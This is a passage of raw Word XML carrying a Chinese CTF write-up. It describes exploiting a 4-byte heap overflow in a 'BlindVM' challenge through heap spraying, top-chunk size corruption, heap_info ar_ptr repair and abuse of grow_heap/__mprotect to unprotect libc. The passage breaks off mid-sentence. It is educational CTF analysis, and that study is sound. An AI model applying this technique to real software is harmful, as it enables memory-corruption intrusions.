        <w:t xml:space="preserve">分配器机制下，却足以篡改诸多极为核心的管理结构：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相邻下方的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> next chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尺寸（size）的低</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位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顶层堆块（top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">chunk）尺寸的低位数据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部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成员变量的低位指针</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目前工作目录下保存的若干堆内存溢出测试样例，已经充分证明此攻击向量切实可行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_over.bin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp_heap24_nofiller.bin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp_top_force.bin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp_two18_nofiller.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过测试，日志记录中捕获到的本地</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> glibc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原生报错信息如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">munmap_chunk(): invalid pointer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">malloc(): corrupted top size</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报错表明，这多出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节溢出确确实实破坏了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> malloc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的底层管理结构，而非仅仅停留在“破坏用户级数据”的鸡肋层面。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="21" w:name="header-n136"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的终极利用路线，实质即为开源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目的无泄漏堆喷利用手法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，整个赛题的防御机制已被彻底剥离：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外围程序的角色只是在“绕开审查机制后替换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令”；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内部虚拟机的角色则是充当“堆内存溢出的触发温床”；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本题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的操作接口与之前知名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WMCTF 2024 BlindVM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">挑战极为相似：均仅包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">add/edit/exit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令，且在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">edit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环节存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节内存踩踏。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">鉴于此，后续攻击思路无需再度创新，直接引入针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的高版本</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> glibc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准通杀策略即可。以下是一篇具有极高指导意义的公开博文：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WJH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">撰写的文章《WMCTF2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pwn BlindVM Writeup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一种无泄漏且无需释放函数的堆利用技术》</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文章链接：</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.wjhwjhn.com/posts/691ef12/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合本题的具体上下文，上述博文的攻击理论可概括为如下几个阶段：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="16" w:name="header-n150"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实施堆喷射，抢占</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对齐区域前置的空闲内存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">鉴于子线程分配的堆区受制于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_max_size()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（本题对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x4000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的内存页对齐分割机制，我们只需通过不断申请由大及小、以内存页为递减梯度的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">块，必定存在某一次特定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，能够促使系统通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完美填补目标内存间隙（gap）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此阶段并非着眼于立即获取系统权限，其战略意义在于：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消除“原生堆区”与“目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所处地址对齐堆区”中间的内存缝隙；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为后续引导</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">old_top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跨越至目标区域打下基础。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="header-n158"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节溢出篡改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> top chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">长度，促使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">old_top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">迫近目标地带</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM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edit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制了最大</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节的越界写，显得极为局限，然而对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> top chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而言，其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> size </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段的低位数据已极具破坏潜力。当我们完成前置的堆风水排布后，仅需针对一个已实现精准对齐的小型堆块触发内存溢出，即可将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> top size </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修正为预期的数值。紧接着，连续构造若干次大体量的分配请求，以此迫使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">old_top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">逐步向高位地址蔓延：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首先触达与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址对齐堆区的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构所在地；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继而持续挺进，逼近</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库所在的内存片段。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="header-n165"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须修复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_info-&gt;ar_ptr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段，规避连续申请时的断言拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处理此节点是高版本</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> glibc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用链路中最容易翻车的环节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当堆顶指针首度被拓展到一片崭新的堆空间（heap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">space）时，系统确实让我们占有了该区域；但若试图再度调用分配请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">malloc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源码中的检验逻辑将核对新区域内的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_info-&gt;ar_ptr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否与当下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相匹配。假使未妥善修复该指针，程序将触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> assert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从而强制终止。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在参考文章给出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用手法里，采取的对策是巧妙排布出一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unsorted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Bin，使其释放后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链表指针恰好覆盖在目标的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_info-&gt;ar_ptr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上。随后，利用低位字节篡改技术（partial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite），将该数据修正为一个绝对合法的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存指针。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">整个修补过程等同于“硬生生凭空捏造出一个合理的堆管理控制块”，只有完成伪造，后续攻击才能顺利向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">腹地展开。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="header-n170"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grow_heap()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__mprotect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存段的保护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">待</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">old_top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">精确落位于包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的堆分配区边界后，立刻提交一次精心计算尺寸的分配调用，强制程序调用堆扩容例程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">grow_heap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heap_info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diff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需要注意的是，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grow_heap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源码实现中，有一处极其危险的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">__mprotect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mprotect_size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new_size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mprotect_size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PROT_READ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PROT_WRITE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假设我们前期精心布局的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">heap_info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构正好瞄准了与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存段相对齐的位置，那么上述的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
